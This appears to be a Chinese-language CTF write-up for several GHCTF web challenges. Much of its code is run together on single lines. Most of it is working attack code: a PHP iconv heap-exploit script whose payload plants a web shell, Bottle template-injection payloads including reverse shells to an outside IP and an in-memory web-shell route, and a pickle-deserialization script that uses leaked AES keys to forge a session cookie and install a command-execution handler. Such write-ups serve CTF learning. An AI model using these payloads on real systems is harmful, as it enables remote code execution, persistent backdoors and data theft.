class Region:"""A memory region."""start: intstop: intpermissions: strpath: str@propertydef size(self):return self.stop - self.startdef print_hex(data):hex_string = binascii.hexlify(data).decode()print(hex_string)def chunked_chunk(data: bytes, size: int = None) -> bytes:"""Constructs a chunked representation of the given chunk. If size is given, thechunked representation has size `size`.For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`."""# The caller does not care about the size: let's just add 8, which is more than# enoughif size is None:size = len(data) + 8keep = len(data) + len(b"\n\n")size = f"{len(data):x}".rjust(size - keep, "0")return size.encode() + b"\n" + data + b"\n"def compressed_bucket(data: bytes) -> bytes:"""Returns a chunk of size 0x8000 that, when dechunked, returns the data."""return chunked_chunk(data, 0x8000)def compress(data) -> bytes:"""Returns data suitable for `zlib.inflate`."""# Remove 2-byte header and 4-byte checksumreturn zlib.compress(data, 9)[2:-4]def ptr_bucket(*ptrs, size=None) -> bytes:"""Creates a 0x8000 chunk that reveals pointers after every step has been ran."""if size is not None:assert len(ptrs) * 8 == sizebucket = b"".join(map(p64, ptrs))bucket = qpe(bucket)bucket = chunked_chunk(bucket)bucket = chunked_chunk(bucket)bucket = chunked_chunk(bucket)bucket = compressed_bucket(bucket)return bucketdef qpe(data: bytes) -> bytes:"""Emulates quoted-printable-encode."""return "".join(f"={x:02x}" for x in data).upper().encode()def b64(data: bytes, misalign=True) -> bytes:payload = base64.b64encode(data)if not misalign and payload.endswith("="):raise ValueError(f"Misaligned: {data}")return payloaddef _get_region(regions, *names):"""Returns the first region whose name matches one of the given names."""for region in regions:if any(name in region.path for name in names):breakelse:failure("Unable to locate region")return regiondef find_main_heap(regions):# Any anonymous RW region with a size superior to the base heap size is a# candidate. The heap is at the bottom of the region.heaps = [region.stop - HEAP_SIZE + 0x40for region in reversed(regions)if region.permissions == "rw-p"and region.size >= HEAP_SIZEand region.stop & (HEAP_SIZE - 1) == 0and region.path == ""]if not heaps:failure("Unable to find PHP's main heap in memory")first = heaps[0]if len(heaps) > 1:heaps = ", ".join(map(hex, heaps))print("Potential heaps: " + heaps + " (using first)")else:print("[*]Using " + hex(first) + " as heap")return firstdef get_regions(maps_path):"""Obtains the memory regions of the PHP process by querying /proc/self/maps."""f = open('maps', 'rb')maps = f.read().decode()PATTERN = re.compile(r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)")regions = []for region in maps.split("\n"):# print(region)match = PATTERN.match(region)if match:start = int(match.group(1), 16)stop = int(match.group(2), 16)permissions = match.group(3)path = match.group(4)if "/" in path or "[" in path:path = path.rsplit(" ", 1)[-1]else:path = ""current = Region(start, stop, permissions, path)regions.append(current)else:print("[*]Unable to parse memory mappings")print("[*]Got " + str(len(regions)) + " memory regions")return regionsdef get_symbols_and_addresses(regions):# PHP's heapheap = find_main_heap(regions)# Libclibc_info = _get_region(regions, "libc-", "libc-2.23.so")return heap, libc_infodef build_exploit_path(libc, heap, sleep, padding, cmd):LIBC = libcADDR_EMALLOC = LIBC.symbols["__libc_malloc"]ADDR_EFREE = LIBC.symbols["__libc_system"]ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]ADDR_HEAP = heapADDR_FREE_SLOT = ADDR_HEAP + 0x20ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10CS = 0x100# Pad needs to stay at size 0x100 at every steppad_size = CS - 0x18pad = b"\x00" * pad_sizepad = chunked_chunk(pad, len(pad) + 6)pad = chunked_chunk(pad, len(pad) + 6)pad = chunked_chunk(pad, len(pad) + 6)pad = compressed_bucket(pad)step1_size = 1step1 = b"\x00" * step1_sizestep1 = chunked_chunk(step1)step1 = chunked_chunk(step1)step1 = chunked_chunk(step1, CS)step1 = compressed_bucket(step1)# Since these chunks contain non-UTF-8 chars, we cannot let it get converted to# ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"step2_size = 0x48step2 = b"\x00" * (step2_size + 8)step2 = chunked_chunk(step2, CS)step2 = chunked_chunk(step2)step2 = compressed_bucket(step2)step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)step2_write_ptr = chunked_chunk(step2_write_ptr, CS)step2_write_ptr = chunked_chunk(step2_write_ptr)step2_write_ptr = compressed_bucket(step2_write_ptr)step3_size = CSstep3 = b"\x00" * step3_sizeassert len(step3) == CSstep3 = chunked_chunk(step3)step3 = chunked_chunk(step3)step3 = chunked_chunk(step3)step3 = compressed_bucket(step3)step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUGassert len(step3_overflow) == CSstep3_overflow = chunked_chunk(step3_overflow)step3_overflow = chunked_chunk(step3_overflow)step3_overflow = chunked_chunk(step3_overflow)step3_overflow = compressed_bucket(step3_overflow)step4_size = CSstep4 = b"=00" + b"\x00" * (step4_size - 1)step4 = chunked_chunk(step4)step4 = chunked_chunk(step4)step4 = chunked_chunk(step4)step4 = compressed_bucket(step4)# This chunk will eventually overwrite mm_heap->free_slot# it is actually allocated 0x10 bytes BEFORE it, thus the two filler valuesstep4_pwn = ptr_bucket(0x200000,0,# free_slot0,0,ADDR_CUSTOM_HEAP, # 0x180,0,0,0,0,0,0,0,0,0,0,0,0,ADDR_HEAP, # 0x1400,0,0,0,0,0,0,0,0,0,0,0,0,size=CS,)step4_custom_heap = ptr_bucket(ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18)step4_use_custom_heap_size = 0x140COMMAND = cmdCOMMAND = f"kill -9 $PPID; {COMMAND}"if sleep:COMMAND = f"sleep {sleep}; {COMMAND}"COMMAND = COMMAND.encode() + b"\x00"assert (len(COMMAND) <= step4_use_custom_heap_size), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")step4_use_custom_heap = COMMANDstep4_use_custom_heap = qpe(step4_use_custom_heap)step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)pages = (step4 * 3+ step4_pwn+ step4_custom_heap+ step4_use_custom_heap+ step3_overflow+ pad * padding+ step1 * 3+ step2_write_ptr+ step2 * 2)resource = compress(compress(pages))resource = b64(resource)resource = f"data:text/plain;base64,{resource.decode()}"filters = [# Create buckets"zlib.inflate","zlib.inflate",# Step 0: Setup heap"dechunk","convert.iconv.latin1.latin1",# Step 1: Reverse FL order"dechunk","convert.iconv.latin1.latin1",# Step 2: Put fake pointer and make FL order back to normal"dechunk","convert.iconv.latin1.latin1",# Step 3: Trigger overflow"dechunk","convert.iconv.UTF-8.ISO-2022-CN-EXT",# Step 4: Allocate at arbitrary address and change zend_mm_heap"convert.quoted-printable-decode","convert.iconv.latin1.latin1",]filters = "|".join(filters)path = f"php://filter/read={filters}/resource={resource}"path = path.replace("+", "%2b")return pathmaps_path = './maps'
cmd = "echo '<?php system($_GET[\"cmd\"]); ?>' > /var/www/html/shell.php"
sleep_time = 1
padding = 20if not os.path.exists(maps_path):exit("[-]no maps file")regions = get_regions(maps_path)
heap, libc_info = get_symbols_and_addresses(regions)libc_path = libc_info.path
print("[*]download: " + libc_path)libc_path = './libc-2.23.so'
if not os.path.exists(libc_path):exit("[-]no libc file")libc = ELF(libc_path, checksec=False)
libc.address = libc_info.startpayload = build_exploit_path(libc, heap, sleep_time, padding, cmd)print("[*]payload:")
print(payload)Message in a Bottle
# 导入Bottle框架核心组件(路由、请求处理、模板引擎、服务器)[1,2](@ref)
from bottle import Bottle, request, template, run# 初始化Bottle应用实例[1,2](@ref)
# Bottle()构造函数创建WSGI兼容的Web应用,整个应用路由基于此实例
app = Bottle()# 数据存储层(临时方案,重启丢失)
messages = [] # 使用内存列表存储留言,适合开发环境快速验证def handle_message(message):"""动态生成HTML模板的核心函数参数:message - 包含所有留言的列表特点:通过字符串拼接实现模板逻辑,适合简单场景[1,2](@ref)"""# 生成留言卡片HTML片段(使用Bootstrap 5样式)message_items = "".join([f"""<div class="message-card"><div class="message-content">{msg}</div><small class="message-time">#{idx + 1} - 刚刚</small></div>""" for idx, msg in enumerate(message)])# 完整的HTML文档结构(包含响应式布局和动画效果)board = f"""<!DOCTYPE html><!-- 省略HTML结构代码 --></html>"""return boarddef waf(message):"""简易Web应用防火墙(WAF)功能:过滤花括号防止模板注入攻击注意:这是基础防护,生产环境需要更严格过滤[2](@ref)"""return message.replace("{", "").replace("}", "")# 路由定义部分(核心业务逻辑)
@app.route('/')
def index():"""首页路由:渲染留言板主界面[1](@ref)使用template()方法调用handle_message生成动态内容特点:将业务逻辑与模板渲染分离"""return template(handle_message(messages))@app.route('/Clean')
def Clean():"""清空留言功能使用全局变量操作需谨慎,生产环境应使用数据库事务[2](@ref)通过JavaScript实现页面跳转保持用户体验"""global messagesmessages = []return '<script>window.location.href="/"</script>'@app.route('/submit', method='POST')
def submit():"""留言提交处理(POST请求专属路由)[2](@ref)通过request.forms获取表单数据处理流程:过滤输入 -> 存储数据 -> 返回更新后的视图"""message = waf(request.forms.get('message'))messages.append(message)return template(handle_message(messages))# 服务器启动配置(开发环境设置)
if __name__ == '__main__':"""启动开发服务器参数说明:- app: 绑定应用实例- host='localhost': 仅本地访问- port=9000: 指定非标准端口避免冲突[1](@ref)生产建议:使用Gunicorn+反向代理部署[1,2](@ref)"""run(app, host='localhost', port=9000)先学习一下bottle框架
SimpleTemplate 模板引擎 — Bottle 0.13-dev 文档
学习知道本来有ssti漏洞,但是这里有waf,将{替换成了},所以打不了。
继续学习发现可以%执行python代码,但是我们的 % 所在的那⼀⾏ % 的前⾯只能有空⽩字符,我们直接换⾏即可。然后这题无回显,打反弹shell
message=%0A%import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("101.200.39.193",5000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);#这个代码可能不直观,下面是它的标准形式
# 导入必要的模块
import socket
import subprocess
import os# 创建一个TCP套接字对象
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)# 连接到指定的主机和端口
s.connect(("vps", 5000))# 将socket的文件描述符复制到标准输入、输出和错误
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)# 启动一个交互式bash shell
p = subprocess.call(["/bin/bash", "-i"])
wp是
%0A%__import__('os').popen("python3 -c 'import os,pty,socket;s=socket.socket
();s.connect((\"111.xxx.xxx.xxx\",7777));[os.dup2(s.fileno(),f)for f in(0,
1,2)];pty.spawn(\"sh\")'").read()还有内存马
% from bottle import Bottle, request
% app=__import__('sys').modules['__main__'].__dict__['app']
% app.route("/shell","GET",lambda :__import__('os').popen(request.params.ge
t('lalala')).read())https://forum.butian.net/share/4048
此题还可以打eval执行与abort回显
Message in a Bottle plus
尝试发现pytho代码执行不了了 ,因为在python⾥%print这本身就是⼀个错误的语法,然⽽语法检测这种东⻄肯定针对的是代码,为了让他可以通过语法检测 ,那么我们将他变成字符串就可以了,所以用引号包裹绕过语法检测
'''
% from bottle import abort
% a=__import__('os').popen("cat /f*").read()
% abort(404,a)
% end
'''GHCTF比赛web方向详细多种解(全)-先知社区
解法二:打内存马
'''
% from bottle import Bottle, request
% app=__import__('sys').modules['__main__'].__dict__['app']
% app.route("/shell","GET",lambda:__import__('os').popen(request.params.get('lalala')).read())
'''
ezzzz_pickle
上来一个登入框,弱密码登入(弱密码爆破)
抓包显示
然后尝试读flag读不到。这里有两种解法
解法一 依旧读docker-entrypoint.sh敏感文件
接下来就直接读 /flag11451412343212351256354就好
解法二:打pickle反序列化
当我们读不到flag时,读一下源码/app/app.py(常识,一般python源码都在这)
from flask import Flask, request, redirect, make_response,render_template
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import padding
import pickle
import hmac
import hashlib
import base64
import time
import osapp = Flask(__name__)def generate_key_iv():key = os.environ.get('SECRET_key').encode()iv = os.environ.get('SECRET_iv').encode()return key, ivdef aes_encrypt_decrypt(data, key, iv, mode='encrypt'):cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())if mode == 'encrypt':encryptor = cipher.encryptor()padder = padding.PKCS7(algorithms.AES.block_size).padder()padded_data = padder.update(data.encode()) + padder.finalize()result = encryptor.update(padded_data) + encryptor.finalize()return base64.b64encode(result).decode() elif mode == 'decrypt':decryptor = cipher.decryptor()encrypted_data_bytes = base64.b64decode(data)decrypted_data = decryptor.update(encrypted_data_bytes) + decryptor.finalize()unpadder = padding.PKCS7(algorithms.AES.block_size).unpadder()unpadded_data = unpadder.update(decrypted_data) + unpadder.finalize()return unpadded_data.decode()users = {"admin": "admin123",
}def create_session(username):session_data = {"username": username,"expires": time.time() + 3600 }pickled = pickle.dumps(session_data)pickled_data = base64.b64encode(pickled).decode('utf-8')key,iv=generate_key_iv()session=aes_encrypt_decrypt(pickled_data, key, iv,mode='encrypt')return sessiondef dowload_file(filename):path=os.path.join("static",filename)with open(path, 'rb') as f:data=f.read().decode('utf-8')return data
def validate_session(cookie):try:key, iv = generate_key_iv()pickled = aes_encrypt_decrypt(cookie, key, iv,mode='decrypt')pickled_data=base64.b64decode(pickled)session_data = pickle.loads(pickled_data)if session_data["username"] !="admin":return Falsereturn session_data if session_data["expires"] > time.time() else Falseexcept:return False@app.route("/",methods=['GET','POST'])
def index():if "session" in request.cookies:session = validate_session(request.cookies["session"])if session:data=""filename=request.form.get("filename")if(filename):data=dowload_file(filename)return render_template("index.html",name=session['username'],file_data=data)return redirect("/login")@app.route("/login", methods=["GET", "POST"])
def login():if request.method == "POST":username = request.form.get("username")password = request.form.get("password")if users.get(username) == password:resp = make_response(redirect("/"))resp.set_cookie("session", create_session(username))return respreturn render_template("login.html",error="Invalid username or password")return render_template("login.html")@app.route("/logout")
def logout():resp = make_response(redirect("/login"))resp.delete_cookie("session")return respif __name__ == "__main__":app.run(host="0.0.0.0",debug=False)pickle反序列化初探-先知社区
pickle反序列化可以看这篇文章,文章讲到pickle.loads(payload)会执行命令,也就是反序列化后就会执行命令,此题的paylaod是session经过AES解密,base64解码后值,此时再反序列化就会执行命令,所以这里就是考伪造sesseion,我们只需要把我们想执行的命令先序列化,再base64编码,再AES加密后的值传入seesion即可。当然,这里首先要知道key与iv,源码说了读envrion,那就去找找
key=ajwdopldwjdowpajdmslkmwjrfhgnbbv
iv=asdwdggiouewhgpw接下来就是写脚本了
import os
import requests
import pickle
import base64
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import padding
def aes_encrypt_decrypt(data, key, iv, mode='encrypt'):cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())if mode == 'encrypt':encryptor = cipher.encryptor()padder = padding.PKCS7(algorithms.AES.block_size).padder()padded_data = padder.update(data.encode()) + padder.finalize()result = encryptor.update(padded_data) + encryptor.finalize()return base64.b64encode(result).decode()elif mode == 'decrypt':decryptor = cipher.decryptor()encrypted_data_bytes = base64.b64decode(data)decrypted_data = decryptor.update(encrypted_data_bytes) + decryptor.finalize()unpadder = padding.PKCS7(algorithms.AES.block_size).unpadder()unpadded_data = unpadder.update(decrypted_data) + unpadder.finalize()return unpadded_data.decode()class A():def __reduce__(self):return (exec,("global exc_class;global code;exc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda a:__import__('os').popen(request.args.get('shell')).read()",))
def exp(url):a = A()pickled = pickle.dumps(a)print(pickled)key = b"ajwdopldwjdowpajdmslkmwjrfhgnbbv"iv = b"asdwdggiouewhgpw"pickled_data = base64.b64encode(pickled).decode('utf-8')payload=aes_encrypt_decrypt(pickled_data,key,iv,mode='encrypt')print(payload)Cookie={"session":payload}request = requests.post(url,cookies=Cookie)print(request)if __name__ == '__main__':url="http://node6.anna.nssctf.cn:21377/"exp(url)路由随便输一个就。 (从这个代码来看,命令执行的路由是通过修改 Flask 应用的错误处理函数来实现的。具体来说,它将 404 错误的处理函数替换为一个 lambda 函数,该函数执行系统命令。因此,当访问不存在的路由时,会触发 404 错误,并执行命令。)
总结一下,以后文件读取的题目多读一下配置文件。